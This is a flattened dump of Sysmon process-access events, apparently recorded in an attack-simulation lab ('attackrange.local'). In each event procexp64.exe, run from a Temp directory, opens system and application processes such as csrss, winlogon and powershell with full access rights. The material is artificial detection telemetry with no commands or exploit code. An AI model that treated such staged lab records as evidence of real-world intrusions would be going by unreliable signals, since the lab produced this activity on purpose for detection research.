15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792861Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792860Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792859Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792858Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:09.969{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792984Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792983Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792982Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792981Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792980Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792979Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792978Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792977Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792976Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792975Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792974Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792973Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792972Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792971Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792970Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792969Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792968Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792967Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792966Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792965Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792964Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792963Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792962Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792961Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792960Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792959Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792958Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792957Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792956Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792955Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792954Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792953Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:10.985{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792952Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 